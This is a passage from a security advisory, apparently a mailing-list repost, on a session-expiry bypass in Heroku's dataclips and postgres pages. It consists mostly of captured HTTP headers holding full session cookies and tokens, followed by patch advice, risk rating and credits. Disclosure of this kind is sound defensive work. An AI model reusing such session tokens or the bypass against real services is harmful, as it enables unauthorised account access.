YkZsUFVrRkpVMkpPYkRsR2VVdHRVeTlQWTBkaFl5OUJlSGRHVVVNMEswOW5SR1pvUVVSdFZY
Uk9SVWxVZGxKS1UwdHJiRTgxZEhRNGMxTnJNbUZrYVVsa01VMUdWRmxJUVVkUlMxZzJTVkJ2
YUdwSVJpdGtSSFVyWTNkRVdISkJjelp4UXpVMGRVOHZMekF4UzFCT2JYRXJibVpUTUV4SVJI
Vmxaa2QzTmtWQlJsSk5ibEpIWkVodksyVnphV1JXVEUxdlQzcEVOREYwWjNSc2RUUndhRmwy
VUdObk0xaEJMMVpQUlN0SVMyazVkbWg1UzBWV1RsTlVWVVEyVjJOVFF6VlZUemxRVlZkelZI
Wm5WbFpxV21FMGJIRjJZM1F2UlRWSlN6Z3hVVkJNVVc1cWQwRjJRekJEWVVrd2RuY3dhVnBt
TjFaQlluWlZlSEZCU2k5WGNYZ3pkVEJKTlRGaVNHSnRNRUpSVGpWdmJXVndjSEJsVGpKa09W
VTNkM0pFVUd0WFVsaDNSbHBJVjNjd01WQkllbTlWUmtodlFXOUNXbEl4WlZkdmVIQk9ZVTVG
WVdKM2FGcE5ORzFuU1ZCVmVHOVFUbTlHWkVKTFQzRkRLM3BVVjAxT1dYVXlUR055YTBGVGIw
OVhSbFZ2UWxjMmEwVTBjV2R5TWpSVk9IWnBkSEEwY1RkaFZEZFpLeTloUnpSUVZtNW9Xa3hV
VkVkUWFIWjRjamxhTUhoSE5FUk9RbTVwZW1RemNHcHlUVmhWWkVWelVEWk5PRlpvYkRNM2Ns
cFBjR3RMUnpsRmVuVllSbXBCVlRseWNuZE1hSGMxVDJ4VGNVNW1lR0pVVnl0a2N6bFZZVlpq
YkZsSFlXNHhZMWhvVVZFMFVVaG5iRzltTmpsRmFXZDRiVUp6VEhCQlZrZzFaWFpJVW1GQ01r
NU5URUZuVnpGSlkyUkdSRnBaVkdJeVkwdGlWVm81ZEU1RGJFTXZha2xIVHpGWmJUQm9SREJ3
WWtsUFpVVTJlWEJvUTA1amVTOURjbmw0UWpCa2EyRXZhblJtY1U5ak4wSk9kbkpYVEhKTGR5
dGpSaXMyVlhwdWEzVnFiRlpKVXpkdldteDVVSFJrVTFsaVJXMHJjMVowVlhwcVdsSTRVV3dy
Y25GWFZFaEZMM1ZQTlZWRVRGSlRPRk14Y2s1MFltRXdaelZUTkV0aFZqTmFZbFJ4T1N0WGNt
MXBTR3RuWW1abVpYQkZXVVpQV21aM1JUZ3dNekUxTjA1ME5FOXBVRFF2Ykc1TGJYSjBVUzlt
TTAxRFkwcEdaVnAzUjNsSE5rNW5aRk5XSzNwT1ExVnhPR2hKVGpWd1NqaGtTWE4wTkdacVFr
UTFRMk5IV0dwb1JYbFNPWEoxZG05T1pWWXlhM2xpUW1wMWJHVmxTelJ6V2xWMVZURkhMMDE1
Y210SlVrVkVMMjk2T0ZKTWEwTTNVVWRyTkVNcmEwOXJibEJWTW5GcVMxRnRjMFJsU1VobWRE
bHRPV3hvTDNkRE9ITmtjVGwxVFRoRlpXaHJaVk5hTlV0VWFIaFBVVVZGUVRCQk4wWmxNMmR4
ZVdoNlJHMDJXRzFhVG1OVVlVaDZTMDl6U3pNM2MzUk5PWEJaTUhWUFEwNVlRekZJWmpCS01H
aGFVM05XYVU4NFVtZFNOVnBoUW5SWUsyNDVWbkZhUWxWdlkxZHpPVFo0TjFWc1pGbHRTV0pO
WkdwU2EwYzRaejB0TFVkRWRUWm1TV0ZVU2tjM1NXeFdRekJCYWs1cGJFRTlQUT09LS1jZTZm
NmQ0MTBhNjQyNzhmZGNkMmEwMjk0ZDUxOGJhNjU0NmQzM2FjBjoGRUY%3D--bd9c611ce38c
8221d606e59d0e41c5571aa3ef06; dashboard_session_nonce=891e297c-fed0-4932-8c59-32d7d341f4dc; _ga=GA1.3.181049422.1411214008; __utma=155166509.181049422.1411214008.1411228144.1411228144.1; __utmb=155166509.7.10.1411228144; __utmc=155166509; __utmz=155166509.1411228144.1.1.utmcsr=dashboard-next.heroku.com|utmccn=
(referral)|utmcmd=referral|utmcct=/new; visitor_id36622=273629684; flash=%7B%7D]
Connection[keep-alive]
Response Header:
Connection[keep-alive]
Server[nginx/1.5.7]
Date[Sat, 20 Sep 2014 15:56:48 GMT]
Content-Type[text/html; charset=utf-8]
Transfer-Encoding[chunked]
status[302 Found]
Strict-Transport-Security[max-age=31536000]
Location[https://dashboard.heroku.com/login]
Cache-Control[must-revalidate, no-cache, no-store, private]
Pragma[no-cache]
Expires[0]
X-Frame-Options[SAMEORIGIN]
x-ua-compatible[IE=Edge,chrome=1]
Set-Cookie[_my-heroku_session=BAh7CUkiEF9jc3JmX3Rva2VuBjoGRUZJIjFsZGdXRT
hzZ0IvNDJIMWJWM1dyU3ZXWXlpZUhMa21YWFVEc2lsV2ExR1ZRPQY7AEZJIg9zZXNzaW9uX2
lkBjsAVEkiJWQ2OTI4OTJkOGQzMDliMzY5YWY5ODFmOThhNWU4NGU4BjsAVEkiC2luX29yZw
Y7AEZGSSIQcmVkaXJlY3RfdG8GOwBGIg0vYWNjb3VudA%3D%3D--3aacd80781b201de87c1
48efa8ef6adb5a004d99; path=/; secure; HttpOnly]
x-request-id[5e276c4f-1382-4328-ae95-b87a73376089]
x-runtime[0.006972]
x-rack-cache[miss]
Via[1.1 vegur]

17:56:39.215[207ms][total 207ms] Status: 304[Not Modified]
GET https://dataclips.heroku.com/ Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Grö�e des Inhalts[0] Mime Type[application/x-unknown-content-type]
Request Header:
Host[dataclips.heroku.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[https://dataclips.heroku.com/]
Cookie[ref=KZaqbfoPQd2NM5_HmtNkDBgaDRYcVm4FgoRlK3QXRYUX5XYlLVpbKsbv-DvM8
FmqnHEUYhAmss84wkpN3jOao6PJyJ90AhbTjDrK5i7V20kDxZvoen4Zz_bztDsXTa1J%7CTz
M52sJrCEMP3TpTvJzGMA%3D%3D%7C4a7a7f34648ede535a79a2bc56dd9366b7df78a1462
aa844f86196b14609e103; _ga=GA1.2.181049422.1411214008; __utma=148535982.181049422.1411214008.1411216956.1411228016.3; __utmc=148535982; __utmz=148535982.1411216956.2.2.utmcsr=postgres.heroku.com|utmccn=(refer
ral)|utmcmd=referral|utmcct=/databases; optimizelySegments=%7B%22173438640%22%3A%22referral%22%2C%22173362769%22
%3A%22ff%22%2C%22173444194%22%3A%22false%22%2C%22221602555%22%3A%22refer
ral%22%2C%22221841254%22%3A%22ff%22%2C%22221734991%22%3A%22false%22%7D; optimizelyEndUserId=oeu1411214007860r0.1948891553088572; optimizelyBuckets=%7B%7D; _session_id=ZXNtT29YN3FZajNrQ2U0OTBWbzZ2VHlWSUJDdnVtNmV3TEtLc25ZT0h5MW9r
S2FRVzRZblpLRktRQkd3ZXZPY2hwMm41a1VjSlNEY3VGbkVXYjRQTWVLcmFsTEk4MDQvc1la
WTViZ2JVZ2RzUEdMNFpGY2JZRTdwdWN3K3ZWTW56VEVpcFU4OHg1T1BQMHBGbTdkNlNFakpZ
MjVMVE1mNnZxM2dPL3BNKzZ1VVljeTRGUk4rbEhqcld1UEdBR3lCdDM5RkxpZk1hZWsyZkFy
Y0dGZmVxeUlheUt5NXhaNGNJb1ZTR2VkL1o0ZHM2OW9HTnBZb1dOZys3dVpGSFdKRDA1Tysv
aHg2enlWMGhLaVhnUmxwbnQ0S1JMeVl3WHFvZWwvaUI2Qy9rQU9aMmhqNllDVVJXa0FsNXZw
ZEdCQVpWS2d0VTlvMjZPQ1hENy9tZmE0REdZT1NvdmN3SDcrMG15dElDRlFNVkJEN24yWS9l
UU03RjduTDkzQlAxcnpkNHhldEhQOVpyZjNUM3JVaU5Fek9BcmI5WGNsN0c2dFRPMTZqMjRy
NnZnRndBYi9rWEcyTGMwMTZadGxhQmVWQ1hQUURyUk9tZjZtZitTSk1LMmNhQmFkOEJ3NFQr
eGdxUS9qeXFrUHdNQWt5cXJvRWxTQis1R1lTWThkeHI4YzRrQVVROFdhTzZEb0pMZTR3K3pL
ZXBoUkVMMlBncUNQZlpleTRPY1U1cHJrPS0tMHFTV09tekRBajVKeXlPS0dESE82QT09--f6
20fe024be3e5610f3af2885c5b2758b30cffbf; __utmb=148535982.65.9.1411228524365]
Connection[keep-alive]
If-None-Match["015d655373394c49a35217e89173847e"]
Response Header:
Content-Length[0]
Connection[keep-alive]
Server[nginx/1.5.7]
Date[Sat, 20 Sep 2014 15:56:49 GMT]
status[304 Not Modified]
Strict-Transport-Security[max-age=31536000]
X-XSS-Protection[1; mode=block]
x-content-type-options[nosniff]
X-Frame-Options[SAMEORIGIN]
Etag["015d655373394c49a35217e89173847e"]
Cache-Control[max-age=0, private, must-revalidate]
Set-Cookie[_session_id=Ync2S1ZnSHM3M2FMZC95S1pZeFQrRnc4bWx0WGpjV21rL2k4U
Eh4WDhyY2lPN29ENHRydzd1aVE4WS81RGMxdUR3Z21nS2R4NUJyNjdLNEs4MWpieGk5QXNhS
1ZEeUxlcldqV3UySXJ4Z3k4NkY2VHhCU3ZxT3NyR2RnYzNlTFdycmFiTXJHM0FqU0lyVEp4Z
Tlhd3ptWjIzM01mMDdnZXJocnc0Q2Y0eHhvR2xoY29haVFWcjZHRExXeXhaVFZRT0JqRmRWS
mY4Yk8weHdNZXZOMU5NMCtYUWVzVUIrQW9GblRPRS9TU0twMGVLTnZjRWpjbFY4NC9LaDMzb
2hUVi84L08zUUV1WEpTMEMxMTlqektjQy8zT1JrMC9RVm5JODJjMnVicXJpRi9xb1FXeThSZ
3JJc2s0SndKUzM4NjJ0SzhudkVncWdJT2NDSHU5N1BhNXpiT0ZQRmY3Q2NwRzhjcFMrbzloT
zlRYUJ0Wi9VbVllMnhEYjRYLzlrRkZwZGhPUFFMckJacExnVlZOMi96NmdnWEltVnB0QTFLV
1JxbkZMRG9GaStGY1RQZ28wSnpJT1JMaUoyWUxTUUNRVHZwSmRhVGNzL3NkWktuZk96YjVkV
TBQSVBaVzNZNytJczJra21yOWQvVHB4bVl5QkJiblVuaEJZTzZVRnpvZjNMUXF5YnZBM01DY
U8vZkp2TWNQRUV2c1VjeVRLOUpOc3VLWWYvUlY5dnhzPS0tTjd6WW9BWUE1a3ZSWE9wRXEyR
mVsZz09--a0b8c8a8f07996dbd6a5c70dbb79cd772dd3db77; path=/; expires=Sun, 21 Sep 2014 15:56:49 -0000; secure; HttpOnly]
x-request-id[b278f0fa-e866-4fd5-91cb-26c023746359]
x-runtime[0.027082]
Via[1.1 vegur]

17:56:48.969[192ms][total 192ms] Status: 304[Not Modified]
GET https://dataclips.heroku.com/clips/new Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Grö�e des Inhalts[0] Mime Type[application/x-unknown-content-type]
Request Header:
Host[dataclips.heroku.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[https://dataclips.heroku.com/]
Cookie[ref=KZaqbfoPQd2NM5_HmtNkDBgaDRYcVm4FgoRlK3QXRYUX5XYlLVpbKsbv-DvM8
FmqnHEUYhAmss84wkpN3jOao6PJyJ90AhbTjDrK5i7V20kDxZvoen4Zz_bztDsXTa1J%7CTz
M52sJrCEMP3TpTvJzGMA%3D%3D%7C4a7a7f34648ede535a79a2bc56dd9366b7df78a1462
aa844f86196b14609e103; _ga=GA1.2.181049422.1411214008; __utma=148535982.181049422.1411214008.1411216956.1411228016.3; __utmc=148535982; __utmz=148535982.1411216956.2.2.utmcsr=postgres.heroku.com|utmccn=(refer
ral)|utmcmd=referral|utmcct=/databases; optimizelySegments=%7B%22173438640%22%3A%22referral%22%2C%22173362769%22
%3A%22ff%22%2C%22173444194%22%3A%22false%22%2C%22221602555%22%3A%22refer
ral%22%2C%22221841254%22%3A%22ff%22%2C%22221734991%22%3A%22false%22%7D; optimizelyEndUserId=oeu1411214007860r0.1948891553088572; optimizelyBuckets=%7B%7D; _session_id=Ync2S1ZnSHM3M2FMZC95S1pZeFQrRnc4bWx0WGpjV21rL2k4UEh4WDhyY2lP
N29ENHRydzd1aVE4WS81RGMxdUR3Z21nS2R4NUJyNjdLNEs4MWpieGk5QXNhS1ZEeUxlcldq
V3UySXJ4Z3k4NkY2VHhCU3ZxT3NyR2RnYzNlTFdycmFiTXJHM0FqU0lyVEp4ZTlhd3ptWjIz
M01mMDdnZXJocnc0Q2Y0eHhvR2xoY29haVFWcjZHRExXeXhaVFZRT0JqRmRWSmY4Yk8weHdN
ZXZOMU5NMCtYUWVzVUIrQW9GblRPRS9TU0twMGVLTnZjRWpjbFY4NC9LaDMzb2hUVi84L08z
UUV1WEpTMEMxMTlqektjQy8zT1JrMC9RVm5JODJjMnVicXJpRi9xb1FXeThSZ3JJc2s0SndK
UzM4NjJ0SzhudkVncWdJT2NDSHU5N1BhNXpiT0ZQRmY3Q2NwRzhjcFMrbzloTzlRYUJ0Wi9V
bVllMnhEYjRYLzlrRkZwZGhPUFFMckJacExnVlZOMi96NmdnWEltVnB0QTFLV1JxbkZMRG9G
aStGY1RQZ28wSnpJT1JMaUoyWUxTUUNRVHZwSmRhVGNzL3NkWktuZk96YjVkVTBQSVBaVzNZ
NytJczJra21yOWQvVHB4bVl5QkJiblVuaEJZTzZVRnpvZjNMUXF5YnZBM01DYU8vZkp2TWNQ
RUV2c1VjeVRLOUpOc3VLWWYvUlY5dnhzPS0tTjd6WW9BWUE1a3ZSWE9wRXEyRmVsZz09--a0
b8c8a8f07996dbd6a5c70dbb79cd772dd3db77; __utmb=148535982.67.9.1411228524365; optimizelyPendingLogEvents=%5B%5D]
Connection[keep-alive]
If-None-Match["809917d3d9ac788b43864dd9470788d6"]
Response Header:
Content-Length[0]
Connection[keep-alive]
Server[nginx/1.5.7]
Date[Sat, 20 Sep 2014 15:56:59 GMT]
status[304 Not Modified]
Strict-Transport-Security[max-age=31536000]
X-XSS-Protection[1; mode=block]
x-content-type-options[nosniff]
X-Frame-Options[SAMEORIGIN]
Etag["809917d3d9ac788b43864dd9470788d6"]
Cache-Control[max-age=0, private, must-revalidate]
Set-Cookie[_session_id=L0FpUHg1M3ZuUkNUeWtxVFNxdW1UY3p0QkM0OUNsVUMyL2VBN
24xZVh3d1hlN2s5VUI5Tjl1b3BzV00yaW93elp0RGNKV3cxODh0VVVmSG9CeC9NSDh0WVVve
kVqUkV5bHFaSStCUnkrZ21iWGRmVy96K210K01tQXo1SkxHRldLVVZYMFdiazVkcG96N3ZUW
GZhK28vRWh5WS9id0ZIWTBTdU51a1dUaWRLK1gvWlI0WFRScW5PMU1MOURsLzV0QnRqdUhZW
E9SSzdZRzVSazEzeko2Y01jZjFGRGNiUVRpQ0doSitISHpjSG8xT1JGamtVeDRKRjhBMHIxZ
kl5Q3N6bW9BODJqekNDMnhpRjExa3N3SlJpbU4xT1Rvc0Y3Uy9wNHdmMUVMbzV5OGxwK0N2b
mJQdVJRazlOamRQbkJ5RXJuVmwvOW94azJhTHRMUzY4WkszdkU0cG9zaExXQ3FWUXZqRXpmc
01DOFB5V1Nhbkp0bzhlejVCZGFaeFh6RGM3TTFqYkV5TXpGNVF3SkptRy95dkVTd1IyRS93S
kVTVjYrRnF1dlFLa0Q2cGdKdkVDV0NoSkdrZDBiRzVyRFRmVHE3Z0hBb1pQbEM4RTBsT3NsN
URYRlZoL0dSNUtsVjRjVFc3cFZFME1DUElhblRxTUdZYVMyUUFUaWQ0YUVMTytLZytVOHJaa
3RQYVJzcUZ3RGZEWEFOdTBWT2Y1ZVQ0b0kzK2k3Z3MwPS0tQnhFMFYyVGxDODRjSXpIQ3g5R
1ZhQT09--1ea1df64ab1a053df5ea5a4eed8a3bda7db428a8; path=/; expires=Sun, 21 Sep 2014 15:56:59 -0000; secure; HttpOnly]
x-request-id[433e3190-bc29-4192-9a61-90754e41bb44]
x-runtime[0.029809]
Via[1.1 vegur]

Reference(s):
https://dataclips.heroku.com/
https://dataclips.heroku.com/clips/new
https://postgres.heroku.com/databases
-
https://dashboard.heroku.com/account
https://dashboard.heroku.com/login
https://id.heroku.com/logout

Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure proof of the dataclip and postgres service values that are processing to use the login credentials.
The service needs to process expired sessions through all portal in the same or next request without allowing to access separtly requested section with the expired session credentials.

Security Risk:
==============
The security risk of the re-auth session bypass vulnerability in the dataclip and postgres information page is estimated as high. (CVSS 6.1)

Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm (at) evolution-sec (dot) com [email concealed]) [www.vulnerability-lab.com]

Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin (at) vulnerability-lab (dot) com [email concealed] - research (at) vulnerability-lab (dot) com [email concealed] - admin (at) evolution-sec (dot) com [email concealed]
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin (at) vulnerability-lab (dot) com [email concealed] or research (at) vulnerability-lab (dot) com [email concealed]) to get a permission.

Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]�

--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research (at) vulnerability-lab (dot) com [email concealed]
PGP KEY: http://www.vulnerability-lab.com/keys/admin (at) vulnerability-lab (dot) com [email concealed]%280x19
8E9928%29.txt

[ reply ]
 

Privacy Statement
Copyright 2010, SecurityFocus